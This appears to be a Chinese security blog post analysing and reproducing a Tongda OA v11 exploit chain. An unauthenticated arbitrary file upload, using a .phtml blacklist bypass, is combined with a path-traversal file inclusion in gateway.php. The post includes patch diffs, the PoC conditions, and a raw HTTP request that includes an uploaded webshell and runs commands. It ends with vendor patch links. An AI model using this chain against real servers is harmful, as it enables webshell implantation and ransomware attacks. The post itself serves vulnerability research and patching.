<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="代码审计,安全研究,PHP-Web安全,">





  <link rel="alternate" href="/atom.xml" title="SecurityCN's blog" type="application/atom+xml">






<meta name="description" content="【漏洞分析&amp;amp;漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现    漏洞名称 通达OA文件包含漏洞    CVE编号 -   影响范围 通达OA v11版本   威胁等级 高危   公开时间#### 一、事件背景    近日，通达OA在官方论坛发布了紧急通知，提供了针对部分用户反馈遭到勒索病毒攻击的安全加固程序。根据公告，遭受攻击的OA服务器首页被恶意篡改，伪装成OA系统错">
<meta name="keywords" content="代码审计,安全研究,PHP-Web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="【漏洞分析&amp;漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现">
<meta property="og:url" content="www.ja0k.com/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/index.html">
<meta property="og:site_name" content="SecurityCN&#39;s blog">
<meta property="og:description" content="【漏洞分析&amp;amp;漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现    漏洞名称 通达OA文件包含漏洞    CVE编号 -   影响范围 通达OA v11版本   威胁等级 高危   公开时间#### 一、事件背景    近日，通达OA在官方论坛发布了紧急通知，提供了针对部分用户反馈遭到勒索病毒攻击的安全加固程序。根据公告，遭受攻击的OA服务器首页被恶意篡改，伪装成OA系统错">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-19-10-22-41.png">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-14-06-28.png">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-14-03-16.png">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-14-41-32.png">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-15-01-40.png">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-15-22-49.png">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-16-10-21.png">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-17-29-31.png">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-19-09-41-20.png">
<meta property="og:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-19-09-35-20.png">
<meta property="og:updated_time" content="2020-03-23T16:23:08.344Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【漏洞分析&amp;漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现">
<meta name="twitter:description" content="【漏洞分析&amp;amp;漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现    漏洞名称 通达OA文件包含漏洞    CVE编号 -   影响范围 通达OA v11版本   威胁等级 高危   公开时间#### 一、事件背景    近日，通达OA在官方论坛发布了紧急通知，提供了针对部分用户反馈遭到勒索病毒攻击的安全加固程序。根据公告，遭受攻击的OA服务器首页被恶意篡改，伪装成OA系统错">
<meta name="twitter:image" content="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-19-10-22-41.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="www.ja0k.com/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/">





  <title>【漏洞分析&漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现 | SecurityCN's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">SecurityCN's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">感谢您关注SecurityCN(微信公众号:securitycn),本号会发布一些个人学习及研究文章，包括但不限于漏洞分析、漏洞挖掘、代码审计、IOT安全、比赛、培训认证等</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="www.ja0k.com/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="扫码关注公众号(SecurityCN)">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/wechat-qcode.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SecurityCN's blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">【漏洞分析&漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-03-17T23:11:47+08:00">
                2020-03-17
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/技术/" itemprop="url" rel="index">
                    <span itemprop="name">技术</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>浏览
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.9k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  8
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>【漏洞分析&amp;漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现<br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-19-10-22-41.png" alt></p>
<table>
<thead>
<tr>
<th>漏洞名称</th>
<th>通达OA文件包含漏洞</th>
</tr>
</thead>
<tbody><tr>
<td>CVE编号</td>
<td>-</td>
</tr>
<tr>
<td>影响范围</td>
<td>通达OA v11版本</td>
</tr>
<tr>
<td>威胁等级</td>
<td>高危</td>
</tr>
<tr>
<td>公开时间#### 一、事件背景</td>
<td></td>
</tr>
</tbody></table>
<p>近日，通达OA在官方论坛发布了紧急通知，提供了针对部分用户反馈遭到勒索病毒攻击的安全加固程序。根据公告，遭受攻击的OA服务器首页被恶意篡改，伪装成OA系统错误提示页面让用户下载安装插件，同时服务器上文件被勒索病毒重命名加密，论坛中有多个用户反馈中招（具体现象为：主页被篡改、站点文件扩展名被修改、并生成一个勒索提示文本文件），论坛地址：<br><a href="http://club.tongda2000.com/forum.php?mod=viewthread&amp;tid=128367&amp;extra=page%3D1" target="_blank" rel="noopener">http://club.tongda2000.com/forum.php?mod=viewthread&amp;tid=128367&amp;extra=page%3D1</a></p>
<p>通过在v11.3版本的测试发现全版本的任意文件上传漏洞结合v11版本的文件包含漏洞可以造成远程命令执行，默认为System权限，恶意攻击者可以成功上传Webshell后门，并进一步释放勒索病毒，危害较大。</p>
<h4 id="二、漏洞信息"><a href="#二、漏洞信息" class="headerlink" title="二、漏洞信息"></a>二、漏洞信息</h4><table>
<thead>
<tr>
<th>漏洞名称</th>
<th>通达OA任意文件上传漏洞</th>
</tr>
</thead>
<tbody><tr>
<td>CVE编号</td>
<td>-</td>
</tr>
<tr>
<td>影响范围</td>
<td>通达OA 2013/2013增强/2015/2016/2017/v11版本</td>
</tr>
<tr>
<td>威胁等级</td>
<td>高危</td>
</tr>
<tr>
<td>公开时间</td>
<td>2020年3月13日</td>
</tr>
<tr>
<td>2020年3月13日</td>
<td></td>
</tr>
</tbody></table>
<h4 id="三、漏洞分析"><a href="#三、漏洞分析" class="headerlink" title="三、漏洞分析"></a>三、漏洞分析</h4><h5 id="3-1-补丁对比"><a href="#3-1-补丁对比" class="headerlink" title="3.1 补丁对比"></a>3.1 补丁对比</h5><p><a href="http://www.tongda2000.com/news/673.php" target="_blank" rel="noopener">http://www.tongda2000.com/news/673.php</a><br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-14-06-28.png" alt><br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-14-03-16.png" alt></p>
<p>根据通达官方的修复说明，需要替换MYOA\webroot下的文件<br>下载官方发布的所有版本的补丁分析后发现：<br>2013/2013增强/2015/2016/2017版本的补丁只有1个文件ispirit\im\upload.php；<br>v11版本的的补丁文件与此次漏洞相关的有ispirit\im\upload.php 和ispirit/interface/gateway.php 等多个文件，所以v11 版本同时受2个漏洞的影响，其他版本暂不确定。</p>
<p>本次分析以通达v11 版本 为例</p>
<ul>
<li>注意：通达OA的php文件采用的是zend54 加密，可以使用 SeayDzend工具进行解密，工具下载地址见附录</li>
</ul>
<h6 id="补丁1-ispirit-im-upload-php-任意文件上传漏洞"><a href="#补丁1-ispirit-im-upload-php-任意文件上传漏洞" class="headerlink" title="补丁1: ispirit\im\upload.php 任意文件上传漏洞"></a>补丁1: ispirit\im\upload.php 任意文件上传漏洞</h6><p>对比补丁前后发现 主要是为了修复未登录任意上传文件，有2处更改<br>首先第1处，就是关于登陆验证文件’./auth.php’ 的调用<br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-14-41-32.png" alt><br>但在upload.php未修复前，有一个if判断如果$P存在且非空就不需要经过auth.php验证即可执行后续代码。利用此处逻辑漏洞可绕过登陆验证直接上传文件。补丁文件中是直接强制include_once ‘./auth.php’; 进行登录验证。<br>第2处，修改是在upload.php中 增加了登录的与数据库中的Session校验</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$time = time();</span><br><span class="line">$sql = &apos;select * from im_recent where ((from_id = \&apos;&apos; . $_SESSION[&apos;LOGIN_UID&apos;] . &apos;\&apos; and to_id = \&apos;&apos; . $DEST_UID . &apos;\&apos;) or (from_id = \&apos;&apos; . $DEST_UID . &apos;\&apos; and to_id = \&apos;&apos; . $_SESSION[&apos;LOGIN_UID&apos;] . &apos;\&apos;)) and type = \&apos;1\&apos;&apos;;</span><br><span class="line">$cursor = exequery(TD::conn(), $sql);</span><br><span class="line">if (0 &lt; mysql_num_rows($cursor)) &#123;</span><br><span class="line">    $sql1 = &apos;UPDATE im_recent SET update_time = \&apos;&apos; . $time . &apos;\&apos; WHERE ((from_id = \&apos;&apos; . $_SESSION[&apos;LOGIN_UID&apos;] . &apos;\&apos; and to_id = \&apos;&apos; . $DEST_UID . &apos;\&apos;) or (from_id = \&apos;&apos; . $DEST_UID . &apos;\&apos; and to_id = \&apos;&apos; . $_SESSION[&apos;LOGIN_UID&apos;] . &apos;\&apos;)) and type = \&apos;1\&apos;&apos;;</span><br><span class="line">    exequery(TD::conn(), $sql1);</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    $sql2 = &apos;INSERT INTO im_recent (from_id,to_id,update_time,type) VALUES (\&apos;&apos; . $_SESSION[&apos;LOGIN_UID&apos;] . &apos;\&apos;,\&apos;&apos; . $DEST_UID . &apos;\&apos;,\&apos;&apos; . $time . &apos;\&apos;,\&apos;1\&apos;)&apos;;</span><br><span class="line">    exequery(TD::conn(), $sql2);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析完补丁之后我们来整体分析下存在漏洞upload.php 文件<br>1.先判断$P 参数是否存在调用Session和 auth登录认证，当$P非空时此处可以绕过auth.php登录验证<br>2.判断$DEST_UID是否为空；其次如果DEST_UID 中存在有<code>,</code>，则通过intval获取整数值；最后当$DEST_UID=0时，UPLOAD_MODE要为2 否接收方ID无效。<br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-15-01-40.png" alt><br>3.UPLOAD_MODE 有3种模式，vociemsg\weixunshare\im，其中im是默认模式，<br>$_FILES全局变量大于等于1的时候(就是有文件上传的时候)，会调用<br>upload方法进行处理，这里的文件上传的 name 为name=”ATTACHMENT<br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-15-22-49.png" alt></p>
<ol start="4">
<li>跟进inc\utility_file.php 的upload方法,发现有个文件名校验函数is_uploadable<br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-16-10-21.png" alt><br>我们看下关于文件后缀名的获取方式，是通过strrpos 函数获取<code>.</code>最后一次出现的位置开始到后面的3个字符串，不能为<code>php</code>,其实黑名单有很多种方式绕过，比如上传后缀名为<code>.phtml</code>，<code>.cpt</code> 等都可以绕过<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">function is_uploadable($FILE_NAME)</span><br><span class="line">&#123;</span><br><span class="line">	$POS = strrpos($FILE_NAME, &quot;.&quot;);</span><br><span class="line"></span><br><span class="line">	if ($POS === false) &#123;</span><br><span class="line">		$EXT_NAME = $FILE_NAME;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		if (strtolower(substr($FILE_NAME, $POS + 1, 3)) == &quot;php&quot;) &#123;</span><br><span class="line">			return false;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		$EXT_NAME = strtolower(substr($FILE_NAME, $POS + 1));</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h6 id="补丁2：ispirit-interface-gateway-php-文件包含漏洞"><a href="#补丁2：ispirit-interface-gateway-php-文件包含漏洞" class="headerlink" title="补丁2：ispirit/interface/gateway.php 文件包含漏洞"></a>补丁2：ispirit/interface/gateway.php 文件包含漏洞</h6><p>通过对比v11.3版本的补丁中gateway.php前后代码发现 第47行后面，增加了对url地址种的<code>..</code>符号的判断，防止用户读取其他目录文件。<br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-18-17-29-31.png" alt><br>通读修复之前的代码发现，整个流程为foreach循环解析$json，如果$key键等于字符串<code>url</code> ,则$url={$key所对应的值}，如果$url非空则调用 ，且数据中包含’general/‘ or ‘ispirit/‘or ‘module/‘时，就会调用include_once对$url进行包含。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">if ($json) &#123;</span><br><span class="line">	$json = stripcslashes($json);</span><br><span class="line">	$json = (array) json_decode($json);</span><br><span class="line"></span><br><span class="line">	foreach ($json as $key =&gt; $val ) &#123;</span><br><span class="line">		if ($key == &quot;data&quot;) &#123;</span><br><span class="line">			$val = (array) $val;</span><br><span class="line"></span><br><span class="line">			foreach ($val as $keys =&gt; $value ) &#123;</span><br><span class="line">				$keys = $value;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		if ($key == &quot;url&quot;) &#123;</span><br><span class="line">			$url = $val;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	if ($url != &quot;&quot;) &#123;</span><br><span class="line">		if (substr($url, 0, 1) == &quot;/&quot;) &#123;</span><br><span class="line">			$url = substr($url, 1);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		if ((strpos($url, &quot;general/&quot;) !== false) || (strpos($url, &quot;ispirit/&quot;) !== false) || (strpos($url, &quot;module/&quot;) !== false)) &#123;</span><br><span class="line">			include_once $url;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>那么就可以在url中传入<code>../</code> 进行跨目录，从而可以包含第1个漏洞上传的php文件，造成RCE</p>
<h4 id="四、漏洞复现"><a href="#四、漏洞复现" class="headerlink" title="四、漏洞复现"></a>四、漏洞复现</h4><p>*本次复现以通达OAv11.3 版本 为例<br>第1个漏洞的Poc的构造需要满足四个条件: P非空、DEST_UID非空且为数字、UPLOAD_MODE为1或2或3、ATTACHMENT的filename后缀名不能为<code>php</code><br>最后构造的Payload如下<br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-19-09-41-20.png" alt><br>上传了1个文件名为<code>a.phtml</code>的php文件 绕过黑名单检测<br>路径为 attach/im/2003/72566742.a.phtml  但该目录不在webroot下不能直接执行webshell，才需要利用后面的文件包含漏洞跨目录解析<br><img src="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/2020-03-19-09-35-20.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">POST /ispirit/interface/gateway.php HTTP/1.1</span><br><span class="line">Host: 192.168.80.1:8000</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Cookie:PHPSESSID=pr7a35d0sh8gheukb4mg6990h4;</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 70</span><br><span class="line"></span><br><span class="line">json=&#123;&quot;url&quot;:&quot;module/../../attach/im/2003/72566742.a.phtml&quot;&#125;&amp;cmd=whoami</span><br></pre></td></tr></table></figure>

<p>最后RCE成功，有一点需要提醒下，通达OA开启了 disable_funcation 功能 很多常见的命令执行函数如 exec、eval、system等都被禁止了，需要bypass<br>想学习绕过的可以参考：<br><code>https://www.cnblogs.com/-qing-/p/10944118.html</code></p>
<h4 id="五、修复建议"><a href="#五、修复建议" class="headerlink" title="五、修复建议"></a>五、修复建议</h4><p>官方提供了以下可能受到影响的版本的补丁：<br>2013版、2013增强版、2015版、2016版、2017版、V11版本<br>下载地址：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">V11版：http://cdndown.tongda2000.com/oa/security/2020_A1.11.3.exe</span><br><span class="line">2017版：http://cdndown.tongda2000.com/oa/security/2020_A1.10.19.exe</span><br><span class="line">2016版：http://cdndown.tongda2000.com/oa/security/2020_A1.9.13.exe</span><br><span class="line">2015版：http://cdndown.tongda2000.com/oa/security/2020_A1.8.15.exe</span><br><span class="line">2013增强版：http://cdndown.tongda2000.com/oa/security/2020_A1.7.25.exe</span><br><span class="line">2013版：http://cdndown.tongda2000.com/oa/security/2020_A1.6.20.exe</span><br></pre></td></tr></table></figure>

<h4 id="六、附录"><a href="#六、附录" class="headerlink" title="六、附录"></a>六、附录</h4><h5 id="本次分析及复现的相关工具地址"><a href="#本次分析及复现的相关工具地址" class="headerlink" title="本次分析及复现的相关工具地址"></a>本次分析及复现的相关工具地址</h5><p><a href="https://github.com/SecurityCN/Vulnerability-analysis/tree/master/通达OA3月漏洞" target="_blank" rel="noopener">https://github.com/SecurityCN/Vulnerability-analysis/tree/master/通达OA3月漏洞</a></p>
<h5 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h5><p>*<a href="http://club.tongda2000.com/forum.php?mod=viewthread&amp;tid=128377&amp;extra=page%3D1" target="_blank" rel="noopener">http://club.tongda2000.com/forum.php?mod=viewthread&amp;tid=128377&amp;extra=page%3D1</a><br>*<a href="https://www.webshell.cc/6379.html" target="_blank" rel="noopener">https://www.webshell.cc/6379.html</a><br>*<a href="https://www.cnblogs.com/-qing-/p/10944118.html" target="_blank" rel="noopener">https://www.cnblogs.com/-qing-/p/10944118.html</a></p>

      
    </div>
    
    
    
	

	
	  <div>
        <div id="wechat_subscriber" style="display: block; padding: 10px 0; margin: 20px auto; width: 100%; text-align: center">
    <img id="wechat_subscriber_qcode" src="/images/wechat-qcode.jpg" alt="扫码关注公众号(SecurityCN) wechat" style="width: 200px; max-width: 100%;">
    <div>欢迎您扫码关注SecurityCN(微信公众号:securitycn),本号会发布一些个人学习及研究文章，包括但不限于漏洞分析、漏洞挖掘、代码审计、IOT安全、比赛、培训认证等</div>
</div>

      </div>
    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechat-reward.jpg" alt="扫码关注公众号(SecurityCN) 微信支付">
        <p>微信支付</p>
      </div>
    

    

    

  </div>
</div>

      </div>
    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Ja0k@SecurityCN
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="www.ja0k.com/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/" title="【漏洞分析&漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现">www.ja0k.com/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/代码审计/" rel="tag"># 代码审计</a>
          
            <a href="/tags/安全研究/" rel="tag"># 安全研究</a>
          
            <a href="/tags/PHP-Web安全/" rel="tag"># PHP-Web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/12/【漏洞通告】CVE-2020-0796Windows SMBv3远程代码执行漏洞安全通告（内含Exp视频和检测方法）/" rel="next" title="【漏洞通告】CVE-2020-0796/Windows SMBv3远程代码执行漏洞安全通告(内含Exp视频和检测方法)">
                <i class="fa fa-chevron-left"></i> 【漏洞通告】CVE-2020-0796/Windows SMBv3远程代码执行漏洞安全通告(内含Exp视频和检测方法)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/" rel="prev" title="【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造">
                【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
